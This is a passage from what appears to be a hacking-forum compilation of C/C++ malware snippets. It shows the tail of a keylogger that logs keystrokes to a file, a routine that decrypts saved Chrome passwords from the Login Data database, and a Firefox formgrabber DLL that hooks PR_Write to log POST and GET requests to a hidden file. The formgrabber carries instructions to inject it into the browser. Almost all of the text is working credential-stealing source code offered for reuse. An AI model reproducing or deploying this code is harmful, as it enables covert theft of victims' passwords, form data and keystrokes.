GetKeyState(VK_NUMLOCK); GetKeyboardState(lpKeyboard); len = 0; switch(vKey) { case VK_BACK: len = wsprintf(buf, "[BP]"); break; case VK_RETURN: len = 2; strcpy(buf, "\r\n"); break; case VK_SHIFT: break; default: if(ToAscii(vKey, MapVirtualKey(vKey, 0), lpKeyboard, &wKey, 0) == 1) len = wsprintf(buf, "%c", (char)wKey); else if(GetKeyNameText(MAKELONG(0, MapVirtualKey(vKey, 0)), szKey, 32) > 0) len = wsprintf(buf, "[%s]", szKey); break; } // Write buf into the log if(len > 0) { if(!WriteFile(hLog, buf, len, &dwWritten, NULL)) return -1; } return 0; } Sursa: [C]GetRawInputData() keylogger
  24. [C] Google Chrome Password Recovery Author: Sacrificial /* * Google Chrome Password Recovery * * Coded by Sacrificial * Sacrificial2010@hotmail.com * */ void GetGoogleChrome() { char szPath[MAX_PATH]; sqlite3 *lpDatabase; sqlite3_stmt *lpStatement; const char *lpTail; char *szURL, *szUsername, *szPassword; DATA_BLOB DataIn, DataOut; SHGetSpecialFolderPath(0, szPath, 0x1C, 0); strcat(szPath, "\\Google\\Chrome\\User Data\\Default\\Login Data"); if(GetFileAttributes(szPath) != 0xFFFFFFFF) { sqlite3_open(szPath, &lpDatabase); sqlite3_prepare_v2(lpDatabase, "SELECT * FROM logins", 20, &lpStatement, &lpTail); do { DataIn.pbData = (LPBYTE)sqlite3_column_blob(lpStatement, 5); DataIn.cbData = sqlite3_column_bytes(lpStatement, 5); if(CryptUnprotectData(&DataIn, 0, 0, 0, 0, 8, &DataOut)) { szURL = (char*)sqlite3_column_text(lpStatement, 0); szUsername = (char*)sqlite3_column_text(lpStatement, 3); szPassword = (char*)DataOut.pbData; szPassword[DataOut.cbData] = '\0'; // Do whatever you want with em; } } while(sqlite3_step(lpStatement) == SQLITE_ROW); } } Note: Its not the best coding, but it works, and like I said its old. It requires the SQLite libraries. For Chrome 6 and up the path is "\\Google\\Chrome\\User Data\\Default\\Login Data" For Chrome 5 and below the path is "\\Google\\Chrome\\User Data\\Default\\Web Data" Would be nice if you gave credits when using this code. Enjoy Sursa: [sNIPPET] Google Chrome Password Recovery
  25. [C] FireFox Formgrabber Author: datemme Heres an example for a Firefox Formgrabber: dllmain: #include "hookdll.cpp" BOOL APIENTRY DllMain( HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved ) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: Funktion(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } HookDll.cpp : // hookdll.cpp : Definiert die exportierten Funktionen für die DLL-Anwendung. #include <iostream> #include <fstream> using namespace std; #pragma once #include <windows.h> #include <prio.h> #pragma comment (lib, "nspr4.lib") BYTE hook[6]; DWORD HookFunction(LPCSTR lpModule, LPCSTR lpFuncName, LPVOID lpFunction, unsigned char *lpBackup) { DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName); BYTE jmp[6] = { 0xe9, //jmp 0x00, 0x00, 0x00, 0x00, //address 0xc3 }; //retn ReadProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0); DWORD dwCalc = ((DWORD)lpFunction - dwAddr - 5); //((to)-(from)-5) memcpy(&jmp[1], &dwCalc, 4); //build the jmp WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, jmp, 6, 0); return dwAddr; } BOOL UnHookFunction(LPCSTR lpModule, LPCSTR lpFuncName, unsigned char *lpBackup) { DWORD dwAddr = (DWORD)GetProcAddress(GetModuleHandle(lpModule), lpFuncName); if (WriteProcessMemory(GetCurrentProcess(), (LPVOID)dwAddr, lpBackup, 6, 0)) return TRUE; return FALSE; } int WriteLog(const char * Filename,char * Text) { ofstream File; //Names File as ofstream (for output to file) //Closes file File.open(Filename,ios::app); //Reopens file to append, if you just used ios::out again, it would erase everything and rewrite the file File << Text; //Outputs to file File.close(); //Closes opened file SetFileAttributes( Filename , FILE_ATTRIBUTE_SYSTEM | FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_NORMAL ); return 1; } PRInt32 cPR_Write( PRFileDesc *fd, const void *buf, PRInt32 amount) { UnHookFunction("nspr4.dll", "PR_Write", hook); PRInt32 hResult = 
PR_Write(fd,buf,amount); if(strncmp((LPCSTR)buf,"POST",lstrlen("POST"))==0){WriteLog("test.txt",(char*)buf);}; if(strncmp((LPCSTR)buf,"GET",lstrlen("GET"))==0){WriteLog("test.txt",(char*)buf);}; HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook); return hResult; } extern "C" void __declspec(dllexport) Funktion() { HookFunction("nspr4.dll", "PR_Write", cPR_Write, hook); } //U need to download Gecko SDK (google it) and set the additional Include path und Lib path in project details //vc++ 2008 compiled in multibyte mode //inject it in FF and have Fun !!! //can be very usefull if u "forgot" your password on a website //advantage compared to Pw-Grabbers and Keylogges: logs manualy inserted passwords and saved passwords both //you can ofcourse filter for special tags with slightly modification datemme Sursa: FireFox Formgrabber